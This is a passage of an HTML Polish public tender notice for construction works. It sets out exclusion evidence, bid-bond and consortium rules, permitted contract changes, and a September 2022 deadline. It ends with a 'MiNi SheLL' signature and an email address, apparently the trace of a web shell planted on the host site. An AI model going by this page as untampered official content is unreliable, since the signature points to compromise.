niezbędnymi<br/>zasobami tych podmiotów. Z treści tego zobowiązania (albo innych dowodów) powinien wynikać:<br/>a) Zakres dostępnych wykonawcy zasobów podmiotu udostępniającego; b) Sposób i okres<br/>udostępniania wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia, c)Czy i w jakim zakresie podmiot udostępniający<br/>zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania Zamawiający żąda oświadczenia<br/>wedle załącznika 3a oraz na wezwanie: a)Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu o braku podstaw do wykluczenia, w zakresie:<br/>- art. 108 ust. 1 pkt 1 ustawy, - art. 108 ust. 1 pkt 2 ustawy<br/>- art. 108 ust. 1 pkt 3 ustawy, - art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka zapobiegawczego, - art. 108 ust. 1 pkt 5 ustawy,<br/>dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy,<br/>- Wzór oświadczenia o aktualności informacji stanowi Załącznik nr 4 do SWZ. b)Oświadczenia w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dn. 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r., poz.<br/>1076 i 1086) z innym wykonawcą, który złożył ofertę, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Wzór oświadczenia<br/>dot.grupy kapitałowej stanowi Załącznik nr 5 do SWZ. c)Odpis lub informacji z Krajowego Rejestru<br/>Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1<br/>pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem. Udział podmiotów<br/>trzecich:1. Zamawiający będzie żądał od Wykonawcy, który polega na zasobach podmiotu<br/>udostępniającego zasoby, przedstawienia podmiotowych środków dowodowych, o których mowa wyżej<br/>3. Oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia,<br/>podmiotowe środki dowodowe, oświadczenie z art. 117 ust. 4 ustawy, zobowiązanie podmiotu<br/>udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Ośw. o spełnianiu warunków udziału w postępowaniu Załącznik nr 3b do<br/>SWZ. 2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w pkt 1, składa każdy z wykonawców. 3. Wykonawca, w przypadku polegania na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o<br/>którym mowa w pkt 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw do wykluczenia tego podmiotu (na wzorze Załącznika nr 3a do SWZ) oraz odpowiednio<br/>spełnianie warunków udziału w postępowaniu, w zakresie w jakim wykonawca powołuje się na jego<br/>zasoby (na wzorze Załącznika nr 3c do SWZ).Na wezwanie wykonawca złoży:a) Wykaz robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (licząc wstecz od dnia, w który<br/>upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. -Wzór wykazu robót stanowi Załącznik nr 6 do SWZ b) Wykaz osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. - Wzór wykazu osób stanowi Załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi być złożone wraz z ofertą.<br/>2)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, który wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <br/>3)	W przypadku, o którym mowa w pkt 2 wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia do oferty dołączają oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. (oświadczenie, o którym mowa w art. 117 ust. 4 ustawy)<br/>4) W odniesieniu do podstaw wykluczenia z postępowania, każdy z Wykonawców wspólnie ubiegających się o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu <br/>z postępowania, natomiast w odniesieniu do pozostałych oświadczeń i dokumentów Wykonawcy ci mogą złożyć jeden wspólny dokument. <br/>Oświadczenie o braku podstaw do wykluczenia z postępowania i o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się <br/>o zamówienie. <br/>Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału <br/>w postępowaniu.<br/>5) Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum (liderem).<br/>Zamawiający będzie żądał od Wykonawcy, który polega na zasobach podmiotu udostępniającego zasoby, przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 4 ppkt 2) lit. a), b) i c), dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz robót, o którym mowa w pkt 4 ppkt 1) lit. a) dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia, podmiotowe środki dowodowe, oświadczenie z art. 117 ust. 4 ustawy, o którym mowa w Rozdz. VIII pkt 10 ppkt 3, zobowiązanie podmiotu udostępniającego zasoby, pełnomocnictwo należy złożyć <br/>w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, zgodnie z przepisami Rozporządzenia z dn. 30 grudnia 2020 r. w sprawie sposobu sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursu (Dz. U. z 2020 r., poz. 2452). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi być złożone wraz z ofertą.<br/>2)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, który wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <br/>3)	W przypadku, o którym mowa w pkt 2 wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia do oferty dołączają oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. (oświadczenie, o którym mowa w art. 117 ust. 4 ustawy)<br/>4) W odniesieniu do podstaw wykluczenia z postępowania, każdy z Wykonawców wspólnie ubiegających się o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu <br/>z postępowania, natomiast w odniesieniu do pozostałych oświadczeń i dokumentów Wykonawcy ci mogą złożyć jeden wspólny dokument. <br/>Oświadczenie o braku podstaw do wykluczenia z postępowania i o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się <br/>o zamówienie. <br/>Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału <br/>w postępowaniu.<br/>5) Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum (liderem).<br/>Zamawiający będzie żądał od Wykonawcy, który polega na zasobach podmiotu udostępniającego zasoby, przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 4 ppkt 2) lit. a), b) i c), dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz robót, o którym mowa w pkt 4 ppkt 1) lit. a) dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia, podmiotowe środki dowodowe, oświadczenie z art. 117 ust. 4 ustawy, o którym mowa w Rozdz. VIII pkt 10 ppkt 3, zobowiązanie podmiotu udostępniającego zasoby, pełnomocnictwo należy złożyć <br/>w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, zgodnie z przepisami Rozporządzenia z dn. 30 grudnia 2020 r. w sprawie sposobu sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursu (Dz. U. z 2020 r., poz. 2452). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy w stos.do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 ust oraz wskazanym we Wzorze umowy. Zamawiający dopuszcza<br/>zmiany umowy w zakresie: 1)zmiany terminu wykonania umowy w przypadku: a)wstrzymania<br/>robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,<br/>b)rozszerzenia zakresu rzeczowego robót w trakcie realizacji przedmiotu niniejszej umowy, c)w<br/>trakcie wykonywania przedm umowy wystąpią niekorzystne warunki pogod. uniemożliwiające<br/>wykonywanie robót budowl.zgodnie z technologią, termin zostanie przesunięty o czas przerwy,<br/>d)w trakcie wykonywania przedmiotu umowy wystąpią zdarzenia losowe o char.siły wyższej,<br/>termin zostanie przesunięty o czas przerwy na usunięcie ich skutków. 2)przedłużenia terminu<br/>wykonania umowy, o okres nie dłuższy niż okres trwania postępowania odwoław.przed KIO oraz<br/>sądem powszechnym, w przyp., gdy zostało wniesione odwołanie w postępowaniu o udz. Zam.<br/>Publ., 3)innych istotnych post. umowy - gdy ich zmiana jest konieczna w zw. ze zmianą<br/>przepisów prawa powszechnie obowiązującego; 4)zmiany zakr. rzeczowego i wynagrodz.<br/>umownego – Zamawiający dopuszcza zmianę zakresu rzecz.podanego w § 1 umowy w nast.<br/>Przyp.: a)Nastąpi uzasadniona konieczność zmiany robót potwierdzona protokołem<br/>konieczności sporządzonym przez Inspektora Nadzoru wraz z Wykonawcą i zatwierdzonym<br/>przez Zamawiającego, b)Nastąpi uzasadniona konieczność zrezygnowania z wykonywania<br/>niektórych robót potwierdzona protokołem konieczności sporządzonym przez Inspektora<br/>Nadzoru zatwierdzonym przez Zamawiającego i Wykonawcę.c) Jeżeli zajdzie konieczność<br/>wykonania robót zamien., dodatk. lub zaniechania części robot potwierdzonych protokółem<br/>konieczności sporządzonym przez Inspektora Nadzoru wraz Wykonawcą i zatwierdzonym przez<br/>Zamawiającego, Wykonawca wyceni te roboty na podstawie cen jednostkowych przyjętych przy<br/>kalkulacji w kosztorysie ofertowym. Jeżeli roboty wynikające z poleceń wprowadzonych<br/>postanowieniami ust. 2 pkt 4 niniejszej umowy, nie odpowiadają opisowi pozycji w kosztorysie<br/>ofertowym, Wykonawca powinien przedłożyć do akceptacji dla Inspektora Nadzoru<br/>(Zamawiającego) kalkulacje ceny jedn.tych robót z uwzględ.cen czynników produkcji nie<br/>wyższych od śr. cen mater., sprzętu i transportu publikowanych w wydawnictwie „Sekocenbud” w<br/>mcu, w którym kalkulacja jest sporządzana oraz nakładów rzecz. określonych w KNR, a w<br/>przypadku robót, dla których nie określono nakładów rzeczowych w KNR, wg innych ogólnie stosowanych katal.lub nakładów własnych zaakceptowanych przez Zamawiającego. Ponadto do<br/>kalkulacji robót dodat., zamien.należy przyjąć czynniki cenotwórcze podane w ofercie. d)Jeżeli<br/>cena jednostk.przedłożona przez Wykonawcę do akceptacji dla Inspektora Nadzoru (Zam.)<br/>będzie skalkulowana niezgodnie z postanowieniami pkt. c, Zamawiający wprowadzi korektę<br/>ceny opartą na własnych wyliczeniach. e)Wykonawca powinien dokonać wyliczeń cen, o których<br/>mowa w pkt. d oraz przedstawić dla Inspektora Nadzoru (Zamawiającego) do akceptacji<br/>wys.wynagr.wynikającą ze zmian przed rozpoczęciem robót wynikających z tych zmian,<br/>f)Wykonawca nie może żądać od Inwestora podwyższenia wynagr., jeżeli wykonał prace<br/>dodatk.bez uzyskania jego zgody na wykonanie tych prac. g)Bez uprzedniej zgody Inwestora<br/>mogą być wykonane tylko roboty, których natychmiastowe wykonanie jest niezbędne ze względu<br/>na bezp.lub konieczność zapobieżenia awarii. Podstawą podjęcia takich robót jest sporządzony<br/>przez Wykonawcę protokół konieczności przedstawiony Inwestorowi po dokonaniu odp.wpisu w<br/>dzienniku budowy. Inwestor pokrywa wartość tych robót jeżeli konieczność ich wykonania nie<br/>powstała z przyczyny, za które odpowiada Wykonawca. 3.Wszelkie zm.umowy mogą być<br/>dokonane jedynie za zgodą obu Stron (wyłączając pkt 4 w § 12) w formie pisemnej pod rygorem<br/>nieważności. Zamawiający dopuszcza możliwość ograniczenia zakresu zamówienia o 10% wartości zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniporta.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający przewiduje możliwość ograniczenia liczby Wykonawców, których zaprosi do<br/>negocjacji, o których mowa w pkt 2, stosując kryteria oceny ofert określone w Rozdz. VII<br/>SWZ.Zamawiający zaprosi do negocjacji maksymalnie trzech Wykonawców, którzy otrzymają<br/>najwyższą sumę punktów za wszystkie kryteria łącznie.

Creat By MiNi SheLL
Email: jattceo@gmail.com